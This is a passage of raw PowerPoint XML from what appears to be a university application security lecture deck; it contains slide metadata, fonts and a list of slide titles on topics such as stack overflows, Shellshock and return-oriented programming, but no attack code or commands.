      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="443882864"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="adam_seclab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25400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:headEnd type="none"/>
          <a:tailEnd type="triangle"/>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152539</TotalTime>
  <Words>25446</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>9985</Paragraphs>
  <Slides>233</Slides>
  <Notes>33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233</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="241" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Hack</vt:lpstr>
      <vt:lpstr>Mangal</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>adam_seclab_theme</vt:lpstr>
      <vt:lpstr>Application Security</vt:lpstr>
      <vt:lpstr>Application Security</vt:lpstr>
      <vt:lpstr>Application Model</vt:lpstr>
      <vt:lpstr>Application Vulnerability Analysis</vt:lpstr>
      <vt:lpstr>Design Vulnerabilities</vt:lpstr>
      <vt:lpstr>Implementation Vulnerabilities</vt:lpstr>
      <vt:lpstr>Deployment Vulnerabilities</vt:lpstr>
      <vt:lpstr>Remote vs. Local Attacks </vt:lpstr>
      <vt:lpstr>The Life of an Application</vt:lpstr>
      <vt:lpstr>Interpretation</vt:lpstr>
      <vt:lpstr>Compilation</vt:lpstr>
      <vt:lpstr>Compilation</vt:lpstr>
      <vt:lpstr>Compilation</vt:lpstr>
      <vt:lpstr>Compilation</vt:lpstr>
      <vt:lpstr>The ELF File Format</vt:lpstr>
      <vt:lpstr>Typical ELF Sections</vt:lpstr>
      <vt:lpstr>The x86 CPU Family</vt:lpstr>
      <vt:lpstr>x86 Registers</vt:lpstr>
      <vt:lpstr>x86 Registers</vt:lpstr>
      <vt:lpstr>x86 Registers</vt:lpstr>
      <vt:lpstr>Beware of the Endianess  (and of Signed Integers)!</vt:lpstr>
      <vt:lpstr>x86 Assembly Language</vt:lpstr>
      <vt:lpstr>Addressing Memory</vt:lpstr>
      <vt:lpstr>Addressing Memory</vt:lpstr>
      <vt:lpstr>Instruction Classes</vt:lpstr>
      <vt:lpstr>Instruction Classes</vt:lpstr>
      <vt:lpstr>Invoking System Calls</vt:lpstr>
      <vt:lpstr>Hello World!</vt:lpstr>
      <vt:lpstr>Program Loading and Execution</vt:lpstr>
      <vt:lpstr>Process Memory Layout</vt:lpstr>
      <vt:lpstr>Process Structure</vt:lpstr>
      <vt:lpstr>Disassembling</vt:lpstr>
      <vt:lpstr>Radare</vt:lpstr>
      <vt:lpstr>IDA Pro</vt:lpstr>
      <vt:lpstr>Hopper</vt:lpstr>
      <vt:lpstr>Attacking UNIX Systems</vt:lpstr>
      <vt:lpstr>Attacking UNIX Applications</vt:lpstr>
      <vt:lpstr>Attack Classes</vt:lpstr>
      <vt:lpstr>File Access Attacks</vt:lpstr>
      <vt:lpstr>The Dot-Dot Attack</vt:lpstr>
      <vt:lpstr>PATH and HOME Attacks</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>A Simple Example</vt:lpstr>
      <vt:lpstr>A Real Example: Shellshock</vt:lpstr>
      <vt:lpstr>A Real Example: Shellshock</vt:lpstr>
      <vt:lpstr>Overflows/Overwrites</vt:lpstr>
      <vt:lpstr>The Stack</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frames</vt:lpstr>
      <vt:lpstr>Calling Convention</vt:lpstr>
      <vt:lpstr>x86 Linux Calling Convention (cdecl)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Stack Overflows</vt:lpstr>
      <vt:lpstr>Implications of Cdecl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“Overflowing” Functions </vt:lpstr>
      <vt:lpstr>How to Exploit a Stack Overflow</vt:lpstr>
      <vt:lpstr>Shellcode Goal</vt:lpstr>
      <vt:lpstr>Return-Oriented Programming</vt:lpstr>
      <vt:lpstr>Return-Oriented Programming</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>ROP</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>ROP</vt:lpstr>
      <vt:lpstr>ROP</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>ROP</vt:lpstr>
      <vt:lpstr>Building the ROP chain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ROP</vt:lpstr>
      <vt:lpstr>Application Security Research</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c:creator>
  <cp:lastModifiedBy>Adam Doupe</cp:lastModifiedBy>
  <cp:revision>3278</cp:revision>
  <cp:lastPrinted>2011-10-05T20:20:50Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-09-20T20:28:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-20T16:48:30Z</dcterms:modified>
</cp:coreProperties>
</file>